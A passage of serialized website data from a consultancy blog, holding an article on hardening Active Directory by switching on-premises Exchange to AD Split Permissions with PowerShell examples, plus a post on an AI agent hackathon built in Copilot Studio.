error ",[63,19875,19876],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[12,19879,19880,19889,19891],{},[251,19881,19882,19883,19888],{},"Download ",[2630,19884,19887],{"href":19885,"rel":19886},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[3135],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[531,19890],{},"\nIt can grant the following PermissionTypes:",[1255,19893,19894,19907,19927,19940],{},[1258,19895,19896,19899],{},[251,19897,19898],{},"CreateUserAndContact",[1255,19900,19901,19904],{},[1258,19902,19903],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[1258,19905,19906],{},"Exchange cmdlets: New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and the matching Remove-*",[1258,19908,19909,19912],{},[251,19910,19911],{},"GroupManage",[1255,19913,19914,19917,19920],{},[1258,19915,19916],{},"Create/Delete Groups, Modify Member",[1258,19918,19919],{},"Exchange cmdlets: New-DistributionGroup, Remove-DistributionGroup, Add-DistributionGroupMember, Update-DistributionGroupMember, Remove-DistributionGroupMember",[1258,19921,19922,19923],{},"Additional usecases: user managing DistributionGroups they own via https://",[19924,19925,19926],"on-prem-exchange",{},"/EAC",[1258,19928,19929,19932],{},[251,19930,19931],{},"UserSendAs",[1255,19933,19934,19937],{},[1258,19935,19936],{},"Modfiy AD Permissions on Users",[1258,19938,19939],{},"Exchange cmdlet: Add-ADPermission",[1258,19941,19942,19945],{},[251,19943,19944],{},"GroupSendAs",[1255,19946,19947,19950],{},[1258,19948,19949],{},"Modfiy AD Permissions on Groups",[1258,19951,19939],{},[186,19953,19955],{"id":19954},"how-to-use-the-script","How to use the script:",[12,19957,19958],{},[63,19959,19960,540,19963,540,19969,540,19972,540,19977],{},[63,19961,19962],{},"Add-ExchangeADSplitPermissionOnOU.ps1 
-TargetOU",[19964,19965,19966],"b",{},[63,19967,19968],{},"\u003COU>",[63,19970,19971],{},"-PermissionType",[19964,19973,19974],{},[63,19975,19976],{},"\u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact>",[63,19978,19979],{},"-Trustee \"AD_Custom Exchange Split permissions replacement",[12,19981,19982,19983,19985],{},"e.g.",[531,19984],{},[63,19986,19987,540,19990,540,19994],{},[63,19988,19989],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[19964,19991,19992],{},[63,19993,19911],{},[63,19995,19996],{},"-Trustee \"AD_Custom Exchange Split permissions replacement\"",[12,19998,19999],{},[63,20000,20001,540,20003,540,20007],{},[63,20002,19989],{},[19964,20004,20005],{},[63,20006,19944],{},[63,20008,19996],{},[12,20010,20011],{},[63,20012,20013,540,20016,540,20020],{},[63,20014,20015],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[19964,20017,20018],{},[63,20019,19931],{},[63,20021,19996],{},[12,20023,20024],{},[63,20025,20026],{},[63,20027,20028],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType CreateUserAndContact -Trustee \"AD_Custom Exchange Split permissions replacement\"",[186,20030,20032],{"id":20031},"grant-exchange-rbac","Grant Exchange RBAC",[12,20034,20035,20038,20040],{},[251,20036,20037],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[531,20039],{},[63,20041,20042],{},"New-RoleGroup -Name \"SplitPermission Security Group Creation and Membership\" -Roles \"Security Group Creation and Membership\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on 
target DLs\" ",[2109,20044,20045],{},[12,20046,20047,540,20051,20053],{},[251,20048,20049],{},[4328,20050,19872],{},[531,20052],{},"Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,20055,20056,20058,20061,20063],{},[531,20057],{},[251,20059,20060],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[531,20062],{},[63,20064,20065],{},"New-RoleGroup -Name \"SplitPermission Mail Recipient Creation\" -Roles \"Mail Recipient Creation\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,20067,20069],{"id":20068},"conclusions","Conclusions",[12,20071,20072],{},"I hope that with this guidance many more will take this important step to secure their Active Directory from compromise via Exchange. 
I have not yet run into issues when I implemented Exchange AD split permissions model and the adoption from this article at our customers.",[12,20074,20075],{},"I hope Microsoft will implement a native way to achieve this granular OU based approach, instead of the current all or nothing, for it to become widely adopted.",[12,20077,20078,20079,12756,20084,20089],{},"As AD Tiering is dear to my heart: Additionally, please do not logon to Exchange servers with Domain Admin (or any Tier0) accounts but treat them as Tier1 from now on and implement AD Tiering asap.\nAs a first step, I recommend tools like ",[2630,20080,20083],{"href":20081,"rel":20082},"https://www.pingcastle.com/",[3135],"PingCastle",[2630,20085,20088],{"href":20086,"rel":20087},"https://www.semperis.com/purple-knight/",[3135],"Purple Knight"," to assess your AD Security and Control Paths.",[2126,20091,20092],{},"\ncode {\n  font-size: inherit\n}\n",{"title":65,"searchDepth":111,"depth":111,"links":20094},[20095,20096,20097,20098,20099,20102,20109],{"id":19580,"depth":329,"text":19581},{"id":19593,"depth":329,"text":19594},{"id":19622,"depth":329,"text":19623},{"id":19655,"depth":329,"text":19656},{"id":19714,"depth":111,"text":19715,"children":20100},[20101],{"id":19732,"depth":329,"text":19733},{"id":19752,"depth":111,"text":19753,"children":20103},[20104,20105,20106,20107,20108],{"id":19762,"depth":329,"text":19763},{"id":19805,"depth":329,"text":19806},{"id":19834,"depth":329,"text":19835},{"id":19954,"depth":329,"text":19955},{"id":20031,"depth":329,"text":20032},{"id":20068,"depth":111,"text":20069},{"lang":2257,"seoTitle":20111,"titleClass":2172,"date":20112,"blogtitlepic":20113,"socialimg":20114,"customExcerpt":20115,"keywords":20116,"hreflang":20117,"scripts":20122,"asideNav":20123,"maxContent":2180,"published":2167},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-01-27","head-vulnerability-management","/heads/head-vulnerability-management.jpg","On-Premises 
Exchange Server installations are still prevalent even for organizations that have moved all mailboxes to the cloud. Also, they are still very powerful within Active Directory so most times there is a strong attack path on compromising the whole AD and with that usually much of the corporate IT. Switching to the so-called “AD Split permissions” removes the critical permissions and I have engineered a solution that removes its downsides that usually prevented the adoption.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[20118,20120],{"lang":2260,"href":20119},"/de/posts/2026-01-27-exchange-active-directory",{"lang":2257,"href":20121},"/en/posts/2026-01-27-exchange-active-directory",{"slick":2180,"form":2180},{"menuItems":20124},[20125,20127,20129,20131,20133],{"href":20126,"text":19581},"#tldr-what-if-we-remove-the-downsides",{"href":20128,"text":19623},"#why-do-we-care-now",{"href":20130,"text":19715},"#but-why-is-no-one-doing-it",{"href":20132,"text":19753},"#show-me-this-no-regrets-option",{"href":20134,"text":20069},"#conclusions","/posts/2026-01-27-exchange-active-directory",{"title":19573,"description":65},"posts/2026-01-27-exchange-active-directory","-FLRS_v-JeBKSrd-UJVsPjyfdPjI2CLJMJUjMXHB5wo",{"id":20140,"title":20141,"author":20142,"body":20143,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":20726,"moment":20727,"navigation":2180,"path":20746,"seo":20747,"stem":20748,"tags":2165,"webcast":2167,"__hash__":20749},"content_es/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without 
regrets",[2348],{"type":9,"value":20144,"toc":20713},[20145,20147,20150,20154,20158,20169,20171,20177,20181,20183,20190,20200,20204,20207,20211,20241,20258,20260,20267,20275,20279,20292,20294,20299,20301,20306,20364,20368,20405,20408,20411,20425,20432,20448,20456,20458,20461,20507,20510,20517,20522,20525,20537,20552,20564,20575,20579,20637,20639,20643,20663,20670,20693,20695,20698,20701,20711],[41,20146,19581],{"id":19580},[12,20148,20149],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[12,20151,20152],{},[2772,20153],{"alt":19589,"src":19590},[12,20155,20156],{},[251,20157,19594],{},[6086,20159,20161,20165,20167],{"style":20160},"margin: 0.25rem 0",[1258,20162,19599,20163],{},[2630,20164,19604],{"href":19602},[1258,20166,19609],{},[1258,20168,19614],{},[12,20170,19619],{},[20172,20173],"video-frame",{"thumb":20174,"alt":20175,"id":20176,":full-width":7656},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[52,20178,20180],{"style":20179},"background:var(--color-black-4); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-blue-dark)","Webcast: Exchange AD Split Permissions without regrets. 
A Step-by-step implementation guide",[41,20182,19623],{"id":19622},[12,20184,20185,20186,20188,19629],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[531,20187],{},[531,20189],{},[1255,20191,20192,20194,20196,20198],{"style":20160},[1258,20193,19634],{},[1258,20195,19637],{},[1258,20197,19640],{},[1258,20199,19643],{},[12,20201,20202],{},[2772,20203],{"alt":19648,"src":19649},[12,20205,20206],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[12,20208,20209],{},[251,20210,19656],{},[1255,20212,20213,20216,20232],{"style":20160},[1258,20214,20215],{},"Entra Connect Sync account when using Password Hash Sync",[1258,20217,20218,20219],{},"Default groups",[1255,20220,20222,20225,20230],{"style":20221},"margin: 0",[1258,20223,20224],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[1258,20226,19672,20227,19678],{},[2630,20228,19677],{"href":20229,"target":2633},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta",[1258,20231,19681],{},[1258,20233,20234,20235],{},"Unprotected custom groups or admin/service accounts",[1255,20236,20237,20239],{"style":20221},[1258,20238,19689],{},[1258,20240,19692],{},[12,20242,20243,20244,20246,19698,20248,20251,20253,19706,20255],{},"It is very hard to retroactively contain all these current and future potential pathways. 
For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,20245],{},[531,20247],{},[2630,20249,19703],{"href":19701,"rel":20250},[3135],[531,20252],{},[531,20254],{},[2630,20256,19711],{"href":19709,"rel":20257},[3135],[41,20259,19715],{"id":19714},[12,20261,20262,20263,20265,19721],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[531,20264],{},[531,20266],{},[2109,20268,20269],{},[12,20270,20271,20274],{},[251,20272,20273],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[12,20276,20277],{},[251,20278,19733],{},[1255,20280,20281,20290],{"style":20160},[1258,20282,20283,20284],{},"New-Mailbox (where Exchange writes to AD) would be:",[1255,20285,20286,20288],{"style":20221},[1258,20287,19743],{},[1258,20289,19746],{},[1258,20291,19749],{},[41,20293,19753],{"id":19752},[12,20295,20296,20298],{},[251,20297,19758],{},": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[186,20300,19763],{"id":19762},[12,20302,20303],{},[251,20304,20305],{},"You should first check which of the affected cmdlets are in use on which OUs:",[524,20307,20308,20315,20317,20323,20325],{},[102,20309,20310,20314],{},[102,20311,20313],{"style":20312},"color:var(--color-orange)","$CsvPath"," = 
\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[531,20316],{},[102,20318,20319,20322],{},[102,20320,20321],{"style":20312},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[531,20324],{},[102,20326,20327,540,20330,20334,20335,540,20338,20340,20341,20344,20345,540,20348,540,20351,540,20353,20356,20357,20360,20361],{},[102,20328,20329],{"style":20312},"Search-AdminAuditLog",[102,20331,20333],{"style":20332},"color:var(--color-blue-medium)","-ResultSize"," 99000 ",[102,20336,20337],{"style":20332},"-Cmdlets",[102,20339,20321],{"style":20312}," | ",[102,20342,20343],{"style":20312},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[102,20346,20347],{"style":20312},"Export-Csv",[102,20349,20350],{"style":20332},"-Path",[102,20352,20313],{"style":20312},[102,20354,20355],{"style":20332},"-Delimiter"," \";\" ",[102,20358,20359],{"style":20332},"-Encoding"," Unicode ",[102,20362,20363],{"style":20332},"-NoTypeInformation",[12,20365,20366],{},[251,20367,19788],{},[524,20369,20370,20386,20388,20396,20398],{},[102,20371,20372,20375,20376,540,20379,540,20381,540,20383,20385],{},[102,20373,20374],{"style":20312},"$CSVs"," = ",[102,20377,20378],{"style":20312},"Import-Csv",[102,20380,20350],{"style":20332},[102,20382,20313],{"style":20312},[102,20384,20355],{"style":20332}," \";\"",[531,20387],{},[102,20389,20390,20340,20392,20395],{},[102,20391,20374],{"style":20312},[102,20393,20394],{"style":20312},"Group-Object"," 
Caller",[531,20397],{},[102,20399,20400,20340,20402,20404],{},[102,20401,20374],{"style":20312},[102,20403,20394],{"style":20312}," CmdletName",[12,20406,20407],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[41,20409,20410],{"id":19805},"Enable Split Permissions Model",[12,20412,20413,20414,20417,20418,20422],{},"Follow Microsoft's instructions ",[251,20415,20416],{},"\"Switch to Active Directory split permissions\""," in\n",[2630,20419,19703],{"href":20420,"rel":20421},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[3135],[4328,20423,20424],{},"(NOT RBAC split permissions)",[12,20426,20427,20428,20431],{},"In essence, it will remove the dangerous permissions of the ",[251,20429,20430],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[524,20433,20434],{},[102,20435,20436,540,20439,540,20442,540,20445],{},[102,20437,20438],{"style":20312},"Setup.exe",[102,20440,20441],{"style":20332},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[102,20443,20444],{"style":20332},"/PrepareAD",[102,20446,20447],{"style":20332},"/ActiveDirectorySplitPermissions:true",[52,20449,420,20451,20453,20454],{"style":20450},"background:#f4f4f4; border-left:4px solid var(--color-green-blue); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[251,20452,20273],{}," To revert back, simply use ",[63,20455,19831],{},[186,20457,19835],{"id":19834},[12,20459,20460],{},"Create a custom AD group and make Exchange servers members.",[524,20462,20463,20469,20471,540,20474,20477,20478,20481,20482,20485,20486,540,20488,540,20491,20494,20495,20497,20477,20500,20503,20504],{},[102,20464,20465],{},[102,20466,20468],{"style":20467},"color:var(--color-black-40)","# adjust OU Path 
first!",[531,20470],{},[102,20472,20473],{"style":20312},"New-ADGroup",[102,20475,20476],{"style":20332},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[102,20479,20480],{"style":20332},"-GroupCategory"," Security ",[102,20483,20484],{"style":20332},"-GroupScope"," DomainLocal ",[102,20487,20350],{"style":20332},[251,20489,20490],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[102,20492,20493],{"style":20332},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[531,20496],{},[102,20498,20499],{"style":20312},"Add-ADGroupMember",[102,20501,20502],{"style":20332},"-Members"," \"Exchange Trusted Subsystem\"\n",[102,20505,20506],{"style":20467},"# reboot Exchange servers for permissions via group to work",[12,20508,20509],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[2109,20511,20512],{},[12,20513,20514,20515,19877],{},"Without these permissions the Exchange server would receive the error ",[63,20516,19876],{},[12,20518,19882,20519,19888],{},[2630,20520,19887],{"href":19885,"rel":20521},[3135],[12,20523,20524],{},"It can grant the following PermissionTypes:",[12,20526,20528,20530,19903,20532,20534],{"style":20527},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[251,20529,19898],{},[531,20531],{},[531,20533],{},[3703,20535,20536],{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[12,20538,20540,20542,19916,20544,20546],{"style":20539},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[251,20541,19911],{},[531,20543],{},[531,20545],{},[3703,20547,20548,20549,20551],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[531,20550],{},"Also: user managing DistributionGroups they own via 
EAC",[12,20553,20554,20556,20558,20559,20561],{"style":20539},[251,20555,19931],{},[531,20557],{},"Modify AD Permissions on Users",[531,20560],{},[3703,20562,20563],{},"Exchange cmdlet: `Add-ADPermission`",[12,20565,20566,20568,20570,20571,20573],{"style":20539},[251,20567,19944],{},[531,20569],{},"Modify AD Permissions on Groups",[531,20572],{},[3703,20574,20563],{},[12,20576,20577],{},[251,20578,19955],{},[524,20580,20581,540,20583,20586,20587,20589,20590,20593,20594,20597,20599,540,20601,20603,20604,20606,20607,20593,20609,540,20611,20603,20613,20615,20616,20593,20618,540,20620,20622,20623,20625,20626,20593,20628,540,20630,20622,20632,20634,20635,20593],{},[102,20582,19887],{"style":20312},[102,20584,20585],{"style":20332},"-TargetOU"," \u003COU> ",[102,20588,19971],{"style":20332}," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[102,20591,20592],{"style":20332},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[102,20595,20596],{"style":20467},"# For example",[531,20598],{},[102,20600,19887],{"style":20312},[102,20602,20585],{"style":20332}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,20605,19971],{"style":20332}," GroupManage ",[102,20608,20592],{"style":20332},[102,20610,19887],{"style":20312},[102,20612,20585],{"style":20332},[102,20614,19971],{"style":20332}," GroupSendAs ",[102,20617,20592],{"style":20332},[102,20619,19887],{"style":20312},[102,20621,20585],{"style":20332}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,20624,19971],{"style":20332}," UserSendAs ",[102,20627,20592],{"style":20332},[102,20629,19887],{"style":20312},[102,20631,20585],{"style":20332},[102,20633,19971],{"style":20332}," CreateUserAndContact 
",[102,20636,20592],{"style":20332},[186,20638,20032],{"id":20031},[12,20640,20641],{},[251,20642,20037],{},[524,20644,20645],{},[102,20646,20647,540,20650,20652,20653,20656,20657,20659,20660,20662],{},[102,20648,20649],{"style":20312},"New-RoleGroup",[102,20651,20476],{"style":20332}," \"SplitPermission Security Group Creation and Membership\" ",[102,20654,20655],{"style":20332},"-Roles"," \"Security Group Creation and Membership\" ",[102,20658,20502],{"style":20332}," \"Organization Management\",\"Recipient Management\" ",[102,20661,20493],{"style":20332}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[2109,20664,20665],{},[12,20666,20667,20669],{},[251,20668,20273],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,20671,20672,20674,20676,20678],{},[531,20673],{},[251,20675,20060],{},[531,20677],{},[524,20679,20680,540,20682,20684,20685,20687,20688,20659,20690,20692],{},[102,20681,20649],{"style":20312},[102,20683,20476],{"style":20332}," \"SplitPermission Mail Recipient Creation\" ",[102,20686,20655],{"style":20332}," \"Mail Recipient Creation\" ",[102,20689,20502],{"style":20332},[102,20691,20493],{"style":20332}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,20694,20069],{"id":20068},[12,20696,20697],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. 
In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[12,20699,20700],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[12,20702,20703,20704,12756,20707,20710],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[2630,20705,20083],{"href":20081,"rel":20706},[3135],[2630,20708,20088],{"href":20086,"rel":20709},[3135]," to assess your AD security posture and identify control path exposures.",[2126,20712,20092],{},{"title":65,"searchDepth":111,"depth":111,"links":20714},[20715,20716,20717,20718,20721,20725],{"id":19580,"depth":111,"text":19581},{"id":19622,"depth":111,"text":19623},{"id":19714,"depth":111,"text":19715},{"id":19752,"depth":111,"text":19753,"children":20719},[20720],{"id":19762,"depth":329,"text":19763},{"id":19805,"depth":111,"text":20410,"children":20722},[20723,20724],{"id":19834,"depth":329,"text":19835},{"id":20031,"depth":329,"text":20032},{"id":20068,"depth":111,"text":20069},{"lang":2170,"seoTitle":20111,"titleClass":2172,"date":20727,"blogtitlepic":20728,"socialimg":20729,"customExcerpt":20730,"keywords":20116,"hreflang":20731,"scripts":20738,"asideNav":20739,"maxContent":2180,"published":2180},"2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. 
The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.",[20732,20734,20736],{"lang":2260,"href":20733},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2170,"href":20735},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2257,"href":20737},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":2180,"form":2180},{"menuItems":20740},[20741,20742,20743,20744,20745],{"href":20126,"text":19581},{"href":20128,"text":19623},{"href":20130,"text":19715},{"href":20132,"text":19753},{"href":20134,"text":20069},"/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":20141,"description":65},"posts/2026-03-01-exchange-ad-split-permissions-hardening","9ZFNX8Pv31TgupGrsjC8PiJPkDiF4A1c8-NeV2LDJ-8",{"id":20751,"title":20752,"author":20753,"body":20754,"cta":2165,"description":20758,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":20790,"moment":20792,"navigation":2180,"path":20805,"seo":20806,"stem":20807,"tags":20808,"webcast":2167,"__hash__":20812},"content_es/posts/2026-03-16-ai-agent-hackathon.md","Six agents. Four weeks. Real production.",[2460],{"type":9,"value":20755,"toc":20788},[20756,20759,20762,20765,20768,20771,20776,20779,20782,20785],[12,20757,20758],{},"How many hours does your IT department spend each week on tasks that an agent could solve in minutes?",[12,20760,20761],{},"There is a kind of process that almost every IT department knows: someone reads contracts. Someone else sorts requirements into categories. 
Someone else answers the same delivery questions they already answered yesterday. These are not glamorous problems. But together they cost tens of thousands of hours a year, and they are surprisingly well suited to AI agents, if you know where to apply the lever.",[12,20763,20764],{},"Six companies did exactly that in February at our offices in Offenbach. Kiekert now categorizes R&D requirements using rule-based logic, with a confidence score and a feedback loop. The agent is already in production. Dr. Oetker built a Contract Review Assistant that reviews IT contracts for critical clauses and generates a structured report for procurement and legal. Eckes-Granini presented two agents: an onboarding agent that guides new employees from their first login through MFA, Office setup and security policies, and a logistics agent that answers operators' questions about shipments, rates and carriers. igefa developed a voice-based phone assistant for internal IT support, connected to JIRA and Confluence. And lila logistik brought perhaps the most unusual project: a use-case generator that observes SharePoint and Exchange to identify automation potential, because the real problem often is not the technology but that nobody in the company identifies the right places to automate.",[12,20766,20767],{},"All of this was built in Copilot Studio, with Agent Flows, Dataverse connections and MCP connectors, accompanied by four of our MVPs. Four weeks of development alongside the regular day-to-day work. The participants had to find every hour for it between tickets, quarterly closings and operations. 
That six working agents existed in the end says less about the technology than about the teams that built them.",[12,20769,20770],{},"On March 10, at the Microsoft Office in Frankfurt, came the final test: six presentations of 20 minutes each, judged on business impact, technical depth and audience applause (yes, that is on the scoring sheet too). Kiekert won because its agent is in production, built by someone from the business side with no IT or Copilot Studio experience. Dr. Oetker, because contract review is so universal that the jury started thinking about its own IT contracts afterwards. That all six teams built a working agent in four weeks alongside their regular jobs was, in the end, the real news of the day.",[20172,20772],{"thumb":20773,"alt":20774,"id":20775,":full-width":7656},"/thumbs/thumb-ai-agent-hackathon.jpg","Presentation at the glueckkanja AI Agent Hackathon in the Microsoft office in Frankfurt: six teams show their Copilot Studio agents to the audience.","GjumQAnKj8k",[52,20777,20778],{"style":20179},"glueckkanja AI Agent Hackathon – Six companies, six agents, four weeks",[12,20780,20781],{},"The format is called glueckkanja AI Agent Hackathon. It grew out of a Microsoft hackathon in Munich in which we participated with Knorr-Bremse. Microsoft then asked us to continue the format with our customers. The idea is simple: companies sign up with a concrete process that is carried out manually today. We refine the use case, define the architecture and build together. For those not ready to take part in the hackathon directly: we also offer workshops to identify use cases and prepare the agent architecture, either as an entry point or as a standalone format.",[12,20783,20784],{},"The next glueckkanja AI Agent Hackathon starts in autumn 2026. Registration is open. 
If you want to identify use cases and prepare your environment before then: we are happy to help. Contact us.",[12,20786,20787],{},"Thanks to Sylvia and Miriam from Microsoft for their trust in the format. To Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik for their courage and dedication. And to our glueckkanja team for making this possible.",{"title":65,"searchDepth":111,"depth":111,"links":20789},[],{"lang":2170,"seoTitle":20791,"titleClass":2172,"date":20792,"categories":20793,"blogtitlepic":20794,"socialimg":20795,"customExcerpt":20796,"keywords":20797,"hreflang":20798,"published":2180},"glueckkanja AI Agent Hackathon: Six companies build AI agents with Copilot Studio","2026-03-16",[2663],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Six companies, four weeks of development, six working AI agents: that was the first glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa and lila logistik created agents in Copilot Studio that are in production today. Here is what was built and how the format works.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. 
Oetker, Eckes-Granini, igefa, lila logistik, AI automation, enterprise AI, process automation",[20799,20801,20803],{"lang":2260,"href":20800},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":2257,"href":20802},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":2170,"href":20804},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":20752,"description":20758},"posts/2026-03-16-ai-agent-hackathon",[20809,20810,20811,18315],"AI","Copilot Studio","Hackathon","mUMQrBAYy0hMGUSdyjrBW8cXB3Y4_indr1vEHu3yHuI",{"id":20814,"title":20815,"author":20816,"body":20817,"cta":2165,"description":20821,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":21064,"moment":21066,"navigation":2180,"path":21122,"seo":21123,"stem":21124,"tags":21125,"webcast":2167,"__hash__":21127},"content_es/posts/2026-03-20-stryker-attack-intune-privilege.md","No Malware. Just an Administrator 